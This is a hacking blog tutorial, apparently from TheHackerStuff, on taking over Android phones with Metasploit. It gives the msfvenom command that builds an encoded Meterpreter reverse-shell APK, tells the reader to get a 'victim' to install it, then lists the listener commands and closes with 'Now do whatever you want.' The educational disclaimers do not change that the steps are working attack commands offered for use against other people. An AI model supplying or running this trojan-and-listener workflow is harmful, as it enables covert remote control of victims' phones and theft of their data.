Hello Tech Kiddies. Here is another tutorial of exploiting android devices. In this post, I will demonstrate how to exploit android devices using the popular metasploit framework which is available in Kali Linux.
What is Metasploit Framework
The Metasploit is an open source framework which contains lots of exploits. The metasploit project offers penetration testing software and provide tools for automating the comparison of a program’s vulnerability and its patched version.
The metasploit framework includes more than 1673 exploits, 959 auxiliary modules, 294 post exploitation modules and 489 payloads in its database. Exploit modules are run against a target to check wheather its vulnerable or not.
All articles on our website are only for Educational/Informational purposes only. The author is not responsile for any illegal activity. TheHackerStuff does not promote any malicious activites.
Exploiting Android using Metasploit Framework
- System with Kali installed.
- Knowledge of basic Linux.
- Internet Connectivity.
- Android device to test.
Let’s start with exploiting.
Create a Payload
Create a payload using msfvenom –
Open terminal and type the below command
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=7777 -i 3 > hack.apk
-p stands for payload which we are using.
lhost – Replace 192.168.1.5 with your own local IP. You can find by typing ifconfig.
lport – This is the port number through which the connection will establish.
-i stands for number of iterations the payload will be encoded.
The payload will get ready after executing the above command. You can find the payload in home directory.
Send the payload to the victim. Let the victim to install tha payload. Once the installation of the payload is done.
Fire Metasploit Framework
Open new terminal and fire up Metasploit Framework by typing msfconsole.
It will take some time to start. Once it starts.
Don't miss - Top10 Powerfull Hacking Android Apps Used By Hackers
Setting Up Listener
Type below commands for setting up listener. First load the multi-handler by typing the below command.
Setup a reverse payload by typing
set payload android/meterpreter/reverse_tcp
Set the lhost with your own local IP.
set lhost 192.168.1.5
Set the port number.
set lport 7777
Exploit (Start the Listener)
The final step, start the listener by typing
Hacked!!!! It will open an meterpreter session. Now do whatever you want.
To list down the sessions. Type “sessions -i”.
To connect to the session. Type “session number”.
Note – This attack works within the network.
Do you want to write for TheHackerStuff ? If you have an interesting and intelligent topic you think we would like to publish, send it to firstname.lastname@example.org
Disclaimer This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.thehackerstuff.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Akshay Sharma is a Cyber Security Analyst. He is a CCNA certified and owner of TheHackerStuff.